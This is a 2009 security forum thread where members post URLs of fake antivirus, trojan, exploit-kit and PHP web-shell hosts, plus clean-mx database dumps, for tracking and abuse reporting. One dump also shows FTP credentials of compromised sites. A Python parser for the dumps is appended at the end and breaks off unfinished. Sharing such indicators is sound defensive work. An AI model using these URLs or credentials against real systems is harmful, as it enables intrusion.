http://genantivirus.com/download/GeneralAntivirus.exe
http://check-for-threats.us/5/11/0/wsetup.exe

http://securitytrial.com/hitin.php?land=30&affid=21700
http://securitytrial.com/download.php?affid=21700
Title: Re: daily something......
Post by: sparsha on July 13, 2009, 10:56:03 am
Fake porn and associated trojan distributing sites

Code: [Select]
http://yourtubetop.com/xplaymovie.php?id=45095
http://exe-paste.com/onlinemovies.45095.exe

http://testtubefilms.com/xfreeporn.php?id=48022
http://exe-porto.com/onlinemovies.1.48022.exe
Title: Re: daily something......
Post by: CkreM on July 13, 2009, 11:19:48 am
Long time no post....


Fake AV:
Code: [Select]
axevoq.cn
scanmeta6.info

Fake AV downloader:
Code: [Select]
x-daily.com/st/img/z/
http://www.virustotal.com/analisis/ec8f810f10303fd92dbd71cad82e4f88b4eeb1a106e0c7f19deb6783d85cff8a-1247469472

Trojans:
Code: [Select]
krisnet.cn/test/mss8.exe
http://www.virustotal.com/analisis/514a5b90e717557b021dc3db33db42306dc98d40244fc5d6ae8bbe35bf85d3f9-1247471742
Code: [Select]
analitics.in/load.php?id=5
http://www.virustotal.com/analisis/638fe7388525c7921a8a25dcdbb724cd2e30191ca61146640abd7bedd0ee37c5-1247474875
Code: [Select]
goodtraff.ru/exe.php
http://www.virustotal.com/analisis/8fef564cab88a2e50d46ba0ecf29962dc8ccb1a47f7b0aabb8d4b0202e2a6412-1247301460
Code: [Select]
onuka.cn/dll/mal.txt
http://www.virustotal.com/analisis/d979c2f805ce2e01d21e49aad39e3ff0f2aa7e98c86b0e5671a7c4868bfa5640-1247482711

Trojan Emold:
Code: [Select]
puppsik.biz/bin/mainokK.exe
http://www.virustotal.com/analisis/1fe41137eacfc78a731628bfb77cb9e32453905fbf19e8bd89cbdbe713d37b4c-1247475919

PDF exploit:
Code: [Select]
www.tech2tech.cn/pack/pdf.php
Trojan:
Code: [Select]
www.tech2tech.cn/pack/load.php
www.virustotal.com/analisis/5e93068f29e3de9cc46273a20daebecb3e0f837b7ad38454032ff040af1502fb-1247175304


PDF Exploit:
Code: [Select]
updatedate.cn/img/pfqf2.php
updatedate.cn/img/pfqf.php
Trojan:
Code: [Select]
updatedate.cn/img/uet.php
http://www.virustotal.com/analisis/6779fd91fd3f3a9aa17e1198af5f599d50bc8e17f0c0abd0232dd67ab02cf1f6-1247467328

Exploits:
Code: [Select]
bezopbizn.ru/up/index.php
http://wepawet.iseclab.org/view.php?hash=e49b5e3e7e53eb102b9b915e12a455cf&t=1247471805&type=js
PDF:
Code: [Select]
bezopbizn.ru/up/pdf.php
Trojan Emold:
Code: [Select]
bezopbizn.ru/up/getexe.php
http://www.virustotal.com/analisis/357a0ba3ef66843d5cb8ff4e6098aa57f380888d710827b6d99a5d30fe222cbc-1247472448

Contains iframe to exploits:
Code: [Select]
sulidev.com/ie.php
http://wepawet.iseclab.org/view.php?hash=fa8b3589b1dbf71ff281b646934c86aa&t=1247478460&type=js
Exploits:
Code: [Select]
usrvnu.ru/shot.php?aff=1
http://wepawet.iseclab.org/view.php?hash=39123a5ebfa961048ee1c9619780defe&t=1247478902&type=js
Code: [Select]
usrvnu.ru/ds94685.htm
http://wepawet.iseclab.org/view.php?hash=aac8d2b75e2eeabfc06fc7f2e3107584&t=1247478766&type=js
Code: [Select]
usrvnu.ru/ds94685.jpg
http://wepawet.iseclab.org/view.php?hash=791a64ca4f4d3dc353b02935ec3aaf5c&t=1247478925&type=js
PDF:
Code: [Select]
usrvnu.ru/pdf.php?id=94685
Exploits:
Code: [Select]
ferarilatka.cn/exp/index.php
http://wepawet.iseclab.org/view.php?hash=8030471c9b20f1a008be9c8ee9218bca&t=1247479213&type=js
PDF:
Code: [Select]
ferarilatka.cn/exp/koxyebuth.pdf
Flash:
Code: [Select]
ferarilatka.cn/exp/xyachuch.swf
Trojan Oficla:
Code: [Select]
ferarilatka.cn/exp/update.php
http://www.virustotal.com/analisis/dc118a1cf32b0d2a69d1629318f7072d0fb4d915c50372b534c892223d5fde45-1247479392

Exploits:
Code: [Select]
wesssrett.cn/catalog/index.php
PDF:
Code: [Select]
wesssrett.cn/catalog/theirTextLayout.pdf
Trojan Oficla:
Code: [Select]
wesssrett.cn/catalog/update.php
http://www.virustotal.com/analisis/dc118a1cf32b0d2a69d1629318f7072d0fb4d915c50372b534c892223d5fde45-1247152324

Exploits:
Code: [Select]
thetests.net/yes/index.php
http://wepawet.iseclab.org/view.php?hash=c8e7a115937fdb157ccc26bca75fab21&t=1247481445&type=js
PDF:
Code: [Select]
www.thetests.net/yes/include/spl.php?stat=Windows XP|Internet Explorer 7.0|US|Internet Explorer
Trojan:
Code: [Select]
www.thetests.net/yes/load.php?s=6
http://www.virustotal.com/analisis/80f0b51b1153675c5a111db83d1a409c3730a67f73273368197a35440fdfc7f6-1247247444

Exploits:
Code: [Select]
webalfa.cn/pab/index.php
http://wepawet.iseclab.org/view.php?hash=fce245c8bb2cd14ff823671322a196cf&t=1247481888&type=js
PDF:
Code: [Select]
webalfa.cn/pab/include/spl.php?stat=Windows XP|Internet Explorer 7.0|US|128.111.48.95
Trojan:
Code: [Select]
webalfa.cn/pab/load.php
http://www.virustotal.com/analisis/dbb5472ac5c82fc089c2a48f9514a6273548ec36c41db49e5bb9e31a7b4c4db7-1247482366
Title: Re: daily something......
Post by: PaJamis on July 14, 2009, 01:21:39 am
Quote
hxxp://hotexefiles.com/onlinemovies.45080.exe
http://www.virustotal.com/analisis/f1a9d76bfa53a8ebb94c3c9a6ce4dd0c2ce1766f64be2d353c1d2db8b041f45c-1247534725
Title: Re: daily something......
Post by: sparsha on July 14, 2009, 02:35:16 pm
System Security rogue related sites
Code: [Select]
http://sucupdate.com/download.php?affid=00000
http://zocleaner.com/download.php?affid=00000

Trojan
Code: [Select]
exenetsfiles.com/onlinemovies.1.48040.exe
http://sexfreetube.net/movies/download/free_stream_video.exe
http://sexfreetube.net/movies/download/codec.exe

Title: Re: daily something......
Post by: cleanmx on July 14, 2009, 03:05:15 pm
Hi Folks another bunch of malware in the wild:
see also http://support.clean-mx.de/clean-mx/viruses?response=alive (http://support.clean-mx.de/clean-mx/viruses?response=alive)

-- gerhard
Code: [Select]
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| timestamp           | scanner    | virusname                                                 | review          | email                        | country | source | netname               | url                                                                                                                                                                                              |
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 2008-08-18 21:20:02 | trendmicro | TROJ_XCHANGER.B                                           | 77.235.49.27    | phone: +302106560551         | NL      | RIPE   | GR-EUROVPS-20070517   | http://www.operasofia.com/install.exe                                                                                                                                                            |
| 2009-05-19 03:55:04 | avira      | TR/Dropper.Gen                                            | 201.12.119.15   | sistemas@intelignet.com.br   | BR      | LACNIC | 002.421.421/0001-11   | http://201.12.119.15/Cadastramento.exe                                                                                                                                                           |
| 2009-05-25 17:55:09 | avira      | DR/FakeAV.MX                                              | 221.5.74.38     | abuse@cnc-noc.net            | CN      | APNIC  | CNCGROUP-GD           | http://dl.guarddog2009.com/av.exe                                                                                                                                                                |
| 2009-06-23 23:55:13 | avira      | TR/Spy.Banker.ABPR                                        | 60.208.77.210   | abuse@cnc-noc.net            | CN      | APNIC  | CNCGROUP-SD           | http://60.208.77.210/MOD/MODULO-ITAU.exe                                                                                                                                                         |
| 2009-06-24 02:55:18 | avira      | TR/ATRAPS.Gen                                             | 208.196.247.108 | NETQ@aitcom.net              | US      | ARIN   | UUNET1996B            | http://208.196.247.108/awstats/classes/src/Telegrama-7614.scr                                                                                                                                    |
| 2009-06-30 14:01:49 | avira      | TR/Dldr.Fake.CGAV                                         | 76.76.103.164   | abuse@existhosting.com       | CA      | ARIN   | INTERWEB-MEDIA        | http://guardlab2009.biz//InstallerWF.exe                                                                                                                                                         |
| 2009-06-30 14:01:49 | avira      | TR/Dldr.Fake.CGAV                                         | 76.76.103.164   | abuse@existhosting.com       | CA      | ARIN   | INTERWEB-MEDIA        | http://guardlab2009.net//InstallerWF.exe                                                                                                                                                         |
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
34 rows in set (0.45 sec)
Title: Re: daily something......
Post by: cleanmx on July 14, 2009, 03:10:38 pm
Hi

These sometimes have JavaScript or something else ... but Avira, ClamAV and TrendMicro are currently not reporting any malware/fraud on these URLs.

I think they should be examined more deeply... I post these here FYI.

-- gerhard

Title: Re: daily something......
Post by: SysAdMini on July 14, 2009, 03:11:57 pm
See also http://support.clean-mx.de/clean-mx/viruses?response=alive

Hi Gerhard,

Interesting database. I didn't know it.
Title: Re: daily something......
Post by: cleanmx on July 14, 2009, 03:21:29 pm
Hi

We maintain three databases:

phishing -> http://support.clean-mx.de/clean-mx/phishing.php?sort=id%20desc&response=alive
abused servers/platforms -> http://support.clean-mx.de/clean-mx/portals.php?sort=id%20desc&response=alive
and malware -> http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive

We notify network abuse contacts and national CERTs to close down these activities....

I would be fine with getting a constant feed from malwaredomainlist....

Update:

You may query only for currently still active malwaredomainlist URLs with:

http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive&sub=sub4

If you omit &response=alive, you will get all ....

-- gerhard
Title: Re: daily something......
Post by: cleanmx on July 16, 2009, 03:00:27 pm
Another bunch, including RFIs.

xml:
http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=xml

csv:
http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=csv

-- gerhard
Title: Re: daily something......
Post by: sparsha on July 19, 2009, 08:09:12 pm
Sites used by the braviax/brastk family to distribute rogues

Title: Re: daily something......
Post by: cleanmx on July 20, 2009, 06:24:45 am
Some malware

Title: Re: daily something......
Post by: cleanmx on July 21, 2009, 12:45:42 pm
another bunch of malware links since 19th of Jul 2009

| 2009-07-20 19:29:19  | clamav  | PHP.Shell-8           | 204.2.183.50    | abuse@ntt.net                    | US      | ARIN   | NTTA-204                   | http://edbotflv.webs.com/fx29id2.txt                                            |
| 2009-07-20 18:58:02  | undef   | unknown_html_RFI_php  | 58.120.227.233  | abuse@hanaro.com                 | KR      | APNIC  | HANANET                    | http://www.junggosum.com/bbs/data/sports_2/idxx.txt                             |
| 2009-07-20 18:38:41  | undef   | unknown_html_RFI_php  | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://flamers.fileave.com/php.txt                                              |
| 2009-07-20 18:27:10  | undef   | unknown_html_RFI_php  | 84.247.200.146  | asr@qualitynet.net               | KW      | RIPE   | QNETSERVERFARM             | http://www.suiteinn.it/news/images/idxx.txt                                     |
| 2009-07-20 18:22:44  | clamav  | PHP.Id-14             | 91.205.125.20   | abuse@gigabase.com               | RU      | RIPE   | GIGABASE-NET               | http://box.dmon.com/id.txt                                                      |
| 2009-07-20 18:20:21  | avira   | PHP/BackDoor.E        | 217.149.62.1    | abuse@futuron.org                | FI      | RIPE   | WEBHOTELLI-SRV             | http://fctribe.com/data/copyright.txt                                           |
| 2009-07-20 17:59:47  | avira   | BDS/Agent.1260.A      | 212.67.202.65   | abuse@pipex.net                  | GB      | RIPE   | UK-PIPEX-HOSTED-SERVERS-12 | http://themusicnetwork.co.uk/l/special_greetings.exe                            |
| 2009-07-20 17:47:23  | avira   | PHP/Spam.5833         | 202.153.125.212 | support@pbase.net                | HK      | APNIC  | POWERBASE-HK               | http://www.datum.com.hk/database_script_16Jul09.txt                             |
| 2009-07-20 17:26:04  | avira   | SPR/PHP.ID            | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://camila69.fileave.com/id.txt                                              |
| 2009-07-20 17:19:56  | avira   | PHP/Small.C           | 207.126.164.194 | robert@skiplink.com              | US      | ARIN   | SKIPLINK                   | http://slam.magicshells.com/~hex/ribz.txt                                       |
| 2009-07-20 17:13:08  | avira   | PHP/C99Shell.B        | 96.31.76.130    | abuse@noc4hosts.com              | US      | ARIN   | NOC4HOSTS1                 | http://www.myshellcode.com/c100.txt                                             |
| 2009-07-20 16:46:49  | undef   | unknown_html_RFI_php  | 69.64.76.172    | abuse@aplus.net                  | US      | ARIN   | ABAC2006A                  | http://www.ohmyflash.com/uiu.txt                                                |
| 2009-07-20 16:20:36  | undef   | unknown_html_RFI_php  | 62.149.140.94   | hostmaster@technorail.com        | IT      | RIPE   | TECHNORAIL-NET             | http://www.z-wave-europe.org/x                                                  |
| 2009-07-20 15:47:09  | avira   | SPR/PHP.ID            | 200.160.204.195 | eduardop@durand.com.br           | BR      | LACNIC | 059.278.085/0001-17        | http://www.afmarcenaria.com.br/templates/hotel/css/idd.txt                      |
| 2009-07-20 15:41:15  | avira   | PHP/Rst.F             | 84.246.225.186  | elbaze@elb.fr                    | FR      | RIPE   | BOULAHBEL                  | http://www.latitude-voile.com/latitude/images/r57                               |
| 2009-07-20 15:29:31  | avira   | SPR/PHP.ID            | 91.197.130.18   | info@data-xata.com               | UA      | RIPE   | DATAXATA-NET               | http://plengeh.wen.ru/id.txt                                                    |
| 2009-07-20 14:59:59  | avira   | SPR/PHP.ID            | 61.63.3.40      | hostmaster@twnic.net.tw          | TW      | APNIC  | TWNIC-TW                   | http://www.emc2watches.com//UserFiles/ivid.txt                                  |
| 2009-07-20 14:54:04  | clamav  | PHP.Id-3              | 216.120.231.11  | john@hostrocket.com              | US      | ARIN   | HRWEBSERVICES              | http://anotherannarbor.org/izrpx/os.txt                                         |
| 2009-07-20 14:48:56  | undef   | unknown_html_RFI_perl | 66.40.52.72     | dhswip@peer1.com                 | US      | ARIN   | MAXIM-4                    | http://Xiz.freehostia.com/MF.txt                                                |
| 2009-07-20 13:51:41  | undef   | unknown_exe           | 202.154.57.35   | fax: +98 21 882662               | IR      | RIPE   | RADNET-NOC-SBY-ID          | http://www.eforel.com/templates/ja_drimia/scripts/ja.script.js                  |
| 2009-07-20 12:40:48  | avira   | SPR/PHP.ID            | 74.54.97.18     | abuse@theplanet.com              | US      | ARIN   | NETBLK-THEPLANET-BLK-14    | http://www.fmi.edu.br/one/idd.txt                                               |
| 2009-07-20 12:30:51  | clamav  | PHP.Id-2              | 74.53.28.130    | abuse@theplanet.com              | US      | ARIN   | NETBLK-THEPLANET-BLK-14    | ftp://hollysoc:50283940@74.53.28.130/public_html/v6id.txt                       |
| 2009-07-20 12:17:37  | avira   | BDS/PHP.Small.O.12    | 221.143.40.37   | abuse@hanaro.com                 | KR      | APNIC  | HANANET                    | http://www.waawaa.com//Partner/order/readme.txt                                 |
| 2009-07-20 10:14:53  | undef   | unknown_html          | 69.50.192.70    | sales@atjeu.com                  | US      | ARIN   | ATJEU                      | http://pcsecurity09.com/                                                        |
| 2009-07-20 10:14:53  | undef   | unknown_html          | 72.52.210.133   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://pcsecurity-09.com/                                                       |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.131   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://homeav2010.com/                                                          |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.132   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://home-anti-virus-2010.com/                                                |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.131   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://homeantivirus2010.com/                                                   |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.132   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://home-antivirus2010.com/                                                  |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.130   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://homeanti-virus-2010.com/                                                 |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.131   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://home-anti-virus2010.com/                                                 |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.130   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://homeanti-virus2010.com/                                                  |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.133   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://homeantivirus-2010.com/                                                  |
| 2009-07-20 10:14:52  | undef   | unknown_html          | 72.52.210.132   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://pc-security09.com/                                                       |
| 2009-07-20 10:14:51  | avira   | TR/Dropper.Gen        | 205.151.16.209  | noc@infoteck.qc.ca               | CA      | ARIN   | IFK-205-151-16-0           | http://205.151.16.209/~susan/E-Greetings.exe                                    |
| 2009-07-20 10:14:51  | undef   | unknown_html          | 72.52.210.130   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://home-av-2010.com/                                                        |
| 2009-07-20 10:14:51  | undef   | unknown_html          | 72.52.210.132   | abuse@liquidweb.com              | US      | ARIN   | LIQUIDWEB-6                | http://home-av2010.com/                                                         |
| 2009-07-20 10:05:17  | avira   | PHP/BackDoor.AR       | 68.178.211.6    | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.firearts.org/events/ws/_b                                            |
| 2009-07-20 09:52:01  | undef   | unknown_html_RFI_php  | 68.178.211.6    | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.firearts.org/events/ws/xxx                                           |
| 2009-07-20 09:51:54  | undef   | unknown_html_RFI_php  | 68.178.211.6    | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.firearts.org/events/ws/_a                                            |
| 2009-07-20 09:25:17  | avira   | SPR/PHP.ID            | 200.108.36.132  | operaciones@MOVISTAR.COM.PA      | PA      | LACNIC | PA-BPBS-LACNIC             | http://ciudad.latinol.com/susan09/id.txt                                        |
| 2009-07-20 08:44:51  | avira   | PHP/Small.C           | 94.40.18.13     | marek.czyzowicz@petrosoft.pl     | PL      | RIPE   | PL-PETROSOFT               | http://www.sks75.rj.pl/media/spread.txt                                         |
| 2009-07-20 08:37:25  | clamav  | PHP.Id                | 221.143.46.104  | abuse@hanaro.com                 | KR      | APNIC  | HANANET                    | http://impeel.com/impeel/wizard/roxx_jpg.txt                                    |
| 2009-07-20 08:13:52  | avira   | PHP/C99Shell.A        | 85.214.69.190   | abuse@strato.de                  | DE      | RIPE   | STRATO-RZG-DED2            | http://wikiheaven.de/wikiheaven/templates/special.txt                           |
| 2009-07-20 08:13:40  | clamav  | PHP.Downloader        | 85.214.69.190   | abuse@strato.de                  | DE      | RIPE   | STRATO-RZG-DED2            | http://wikiheaven.de/wikiheaven/templates/yes.txt                               |
| 2009-07-20 08:13:28  | avira   | SPR/PHP.ID            | 85.214.69.190   | abuse@strato.de                  | DE      | RIPE   | STRATO-RZG-DED2            | http://wikiheaven.de/wikiheaven/templates/id.txt                                |
| 2009-07-20 07:52:56  | undef   | unknown_html_RFI_php  | 202.59.152.102  | hm-changed@apnic.net             | HK      | APNIC  | NET-FNCL                   | http://hongfuqitian.com/m1.gif                                                  |
| 2009-07-20 07:25:45  | undef   | unknown_html_RFI_php  | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://bangsat6.fileave.com/id.txt                                              |
| 2009-07-20 07:19:00  | avira   | PHP/IrcBot.F          | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://kontil.fileave.com/bot2.txt                                              |
| 2009-07-20 06:57:00  | undef   | unknown_html_RFI_php  | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://hampod.fileave.com/wet.txt                                               |
| 2009-07-20 03:57:29  | clamav  | PHP.Shell-22          | 68.142.212.71   | network-abuse@cc.yahoo-inc.com   | US      | ARIN   | INKTOMI-BLK-4              | http://www.coslcms.org/public/calendar//tools/safe.txt                          |
| 2009-07-20 02:15:06  | avira   | PHP/BackDoor.AR       | 66.40.52.72     | dhswip@peer1.com                 | US      | ARIN   | MAXIM-4                    | http://Xiz.freehostia.com/fx29id2.txt                                           |
| 2009-07-20 01:51:06  | clamav  | PHP.Id-2              | 211.202.2.220   | abuse@hanaro.com                 | KR      | APNIC  | HANANET                    | http://dwno.or.kr/bbs/zipcode/v6.txt                                            |
| 2009-07-20 00:39:04  | avira   | EXP/PHP.E             | 72.5.169.70     | abuse@internap.com               | US      | ARIN   | PNAP-09-2004               | http://eqz.zapto.org/aod.gif                                                    |
| 2009-07-19 22:27:51  | avira   | PHP/BackDoor.AR       | 94.40.18.13     | marek.czyzowicz@petrosoft.pl     | PL      | RIPE   | PL-PETROSOFT               | http://www.sks75.rj.pl/media/php.txt                                            |
| 2009-07-19 21:59:55  | avira   | PHP/BackDoor.AR       | 66.90.104.9     | abuse@fdcservers.net             | US      | ARIN   | FDCSERVERS                 | http://haxor-vendetta.com/id2.txt                                               |
| 2009-07-19 21:41:18  | clamav  | PHP.Shell-22          | 207.126.164.215 | robert@skiplink.com              | US      | ARIN   | SKIPLINK                   | http://www.magicshells.com/~hex/zenica.txt                                      |
| 2009-07-19 21:33:33  | clamav  | PHP.ShellExec         | 98.137.46.72    | network-abuse@cc.yahoo-inc.com   | US      | ARIN   | A-YAHOO-US9                | http://www.geocities.com/robbys.caem/whois.txt                                  |
| 2009-07-19 21:32:45  | avira   | PHP/Pbot.A.6          | 66.102.100.85   | dangelo@anet.com                 | US      | ARIN   | ANET-BLK-06                | http://www.diversityworking.com/career/o.txt                                    |
| 2009-07-19 21:23:58  | clamav  | PHP.Shell             | 87.106.54.234   | abuse@schlund.de                 | DE      | RIPE   | SCHLUND-CUSTOMERS          | http://geschenkpuzzle.de/logs/session/locus.txt                                 |
| 2009-07-19 20:57:04  | avira   | TR/PHPShell.U         | 210.220.213.203 | abuse@hanaro.com                 | KR      | APNIC  | KRNIC-KR                   | http://www.solmae.co.kr///receipt/lib/_private/sh.txt                           |
| 2009-07-19 20:37:33  | clamav  | PHP.Downloader-4      | 210.220.213.203 | abuse@hanaro.com                 | KR      | APNIC  | KRNIC-KR                   | http://www.solmae.co.kr///receipt/lib/_private/scan/spread.txt                  |
| 2009-07-19 20:37:18  | avira   | PHP/Agent.G           | 210.220.213.203 | abuse@hanaro.com                 | KR      | APNIC  | KRNIC-KR                   | http://www.solmae.co.kr///receipt/lib/_private/scan/id.txt                      |
| 2009-07-19 20:10:29  | avira   | PHP/Small.C           | 64.185.237.80   | Domains@cbcast.net               | US      | ARIN   | CBCAST                     | http://www.pupapa.com/zero/tmp/read.txt                                         |
| 2009-07-19 19:47:34  | undef   | unknown_html_RFI_php  | 218.5.74.92     | fjnic@fjdcb.fz.fj.cn             | CN      | APNIC  | CHINANET-FJ                | http://www.yw365.com/images/cache/ml.txt                                        |
| 2009-07-19 19:40:17  | clamav  | PHP.Remoteadmin-3     | 203.26.41.138   | vic@cia.com.au                   | AU      | APNIC  | CIA-AU                     | http://mpva.com.au/x                                                            |
| 2009-07-19 19:38:01  | avira   | PHP/BackDoor.AR       | 200.98.196.94   | l-registrobr-uol@corp.uol.com.br | BR      | LACNIC | 001.109.184/0001-95        | http://www.msgwebmailcontrol.com/botp/id2.txt                                   |
| 2009-07-19 19:37:40  | undef   | unknown_html_RFI_php  | 200.98.196.94   | l-registrobr-uol@corp.uol.com.br | BR      | LACNIC | 001.109.184/0001-95        | http://www.msgwebmailcontrol.com/botp/id1.txt                                   |
| 2009-07-19 19:27:06  | undef   | unknown_html_RFI_php  | 98.137.46.72    | network-abuse@cc.yahoo-inc.com   | US      | ARIN   | A-YAHOO-US9                | http://www.geocities.com/djerink_anyib/BaruLagi/Baru.txt                        |
| 2009-07-19 19:05:16  | avira   | EXP/PHP.E             | 82.204.219.221  | noc@pochta.ru                    | RU      | RIPE   | POCHTA_RU-NET              | http://god.paypalgod.pochta.ru/flashcard/cmd.txt                                |
| 2009-07-19 19:04:13  | undef   | unknown_html_RFI_php  | 211.234.100.83  | kidc@hanbiro.com                 | KR      | APNIC  | KRNIC-KR                   | http://www.sh1908.org//bbs/1.txt                                                |
| 2009-07-19 18:17:23  | avira   | SPR/PHP.Small.F       | 81.223.41.226   | abuse@inode.at                   | AT      | RIPE   | CISC-Semiconductor         | http://www.cisc.at/survey/classes/core/key.gif                                  |
| 2009-07-19 17:57:14  | avira   | PHP/C99Shell.C        | 201.33.17.118   | contato@datacorpore.com.br       | BR      | LACNIC | 008.210.265/0001-26        | ftp://oceanovirtual.com.br:200677@oceanovirtual.com.br/x/web.php                |
| 2009-07-19 16:58:14  | clamav  | PHP.Bot-6             | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://uciha.fileave.com/Nanderz.txt                                            |
| 2009-07-19 15:17:43  | undef   | unknown_html_RFI_php  | 206.221.191.3   | domain@corporatesummaries.com    | US      | ARIN   | CORPORATESUMMARIES         | http://coinheaven.com/blog/images/hard/fx2id.txt                                |
| 2009-07-19 15:07:55  | undef   | unknown_html_RFI_php  | 98.137.46.72    | network-abuse@cc.yahoo-inc.com   | US      | ARIN   | A-YAHOO-US9                | http://www.geocities.com/kelvin_aja/ping.txt                                    |
| 2009-07-19 14:39:14  | undef   | unknown_html_RFI_php  | 64.185.237.80   | Domains@cbcast.net               | US      | ARIN   | CBCAST                     | http://www.pupapa.com/zero/tmp/sp.v                                             |
| 2009-07-19 12:48:51  | avira   | BDS/PHP.Agent.BH      | 79.174.72.79    | abuse@hc.ru                      | RU      | RIPE   | HOSTING-COMPANY-NET        | http://www.cityfit.ru/stat/dtc.txt                                              |
| 2009-07-19 12:27:24  | avira   | PHP/Pbot.A            | 200.87.164.22   | ip@ENTELNET.BO                   | BO      | LACNIC | BO-ESEN-LACNIC             | http://www.sanagustin.edu.bo/modules/aprinter.xpp                               |
| 2009-07-19 12:00:45  | avira   | PHP/BackDoor.AR       | 68.178.211.6    | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.firearts.org/events//ws/_b                                           |
| 2009-07-19 11:58:27  | undef   | unknown_html_RFI_php  | 68.178.211.6    | abuse@godaddy.com                | US      | ARIN   | GO-DADDY-SOFTWARE-INC      | http://www.firearts.org/events//ws/_a                                           |
| 2009-07-19 11:41:41  | avira   | PHP/Spam.5833         | 98.137.46.72    | network-abuse@cc.yahoo-inc.com   | US      | ARIN   | A-YAHOO-US9                | http://www.geocities.com/urgly@ymail.com/money.txt                              |
| 2009-07-19 11:31:32  | avira   | BDS/PHP.ali.9         | 69.89.31.237    | abuse@bluehost.com               | US      | ARIN   | BLUEHOST-NETWORK-1         | http://www.todsaporn.com/test/cfg                                               |
| 2009-07-19 10:19:13  | undef   | unknown_html_RFI_php  | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICANE-4                | http://bangsat5.fileave.com/id.txt                                              |
| 2009-07-19 09:20:00  | avira   | SPR/PHP.ID            | 61.59.200.127   | ccyang@du.net.tw                 | TW      | APNIC  | SEEDNET-TW                 | http://61.59.200.127/appserv/z.txt                                              |
| 2009-07-19 08:59:23  | avira   | PHP/BackDoor.AR       | 64.62.181.43    | abuse@he.net                     | US      | ARIN   | HURRICAN
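The tables in this thread are raw MySQL console output from the cleanmx database, pasted into a forum that truncates long posts mid-line and HTML-escapes `&` inside URLs. As an added example (not part of any post in the thread), the Python below parses that dump format into records, skips the truncated row, restores the `&amp;` artifact, and derives the things a responder usually wants from such a list: a distinct hostname list, per-column counts, the rows no scanner flagged, and the `ftp://user:pass@host` rows that expose a compromised site's own login. The SAMPLE rows are copied from the tables in this thread; field names come from the dump's own header row (note that the column the dump labels `review` holds an IP address here).

```python
"""Parse a cleanmx-style MySQL console dump of malware URLs.

Added example, not taken from the forum posts. SAMPLE holds rows copied from
the tables in this thread (one of them truncated, as the board cut it off);
column names come from the dump's own header row.
"""
from collections import Counter
from html import unescape
from urllib.parse import urlsplit

SAMPLE = """\
+----------------------+---------+-----------------------+--------------+--------------+---------+--------+-------------+------------------------------------------------------------+
| from_unixtime(first) | scanner | virusname             | review       | email        | country | source | netname     | url                                                        |
+----------------------+---------+-----------------------+--------------+--------------+---------+--------+-------------+------------------------------------------------------------+
| 2009-07-21 13:25:19  | avira   | TR/Dropper.Gen        | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zh4ck3rz/out.exe                      |
| 2009-07-21 13:25:18  | undef   | unknown_html          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/zahirka/index.php?link=http://&amp;size |
| 2009-07-20 18:38:41  | undef   | unknown_html_RFI_php  | 64.62.181.43 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://flamers.fileave.com/php.txt                         |
| 2009-07-20 12:30:51  | clamav  | PHP.Id-2              | 74.53.28.130 | abuse@theplanet.com | US | ARIN | NETBLK-THEPLANET-BLK-14 | ftp://hollysoc:50283940@74.53.28.130/public_html/v6id.txt |
| 2009-07-19 08:59:23  | avira   | PHP/BackDoor.AR       | 64.62.181.43 | abuse@he.net | US      | ARIN   | HURRICAN
+----------------------+---------+-----------------------+--------------+--------------+---------+--------+-------------+------------------------------------------------------------+
"""


def _cells(line):
    """Split one '| a | b |' row into stripped cell strings."""
    return [c.strip() for c in line.strip().strip("|").split("|")]


def parse_dump(text):
    """Return one dict per complete data row, keyed by the header names.

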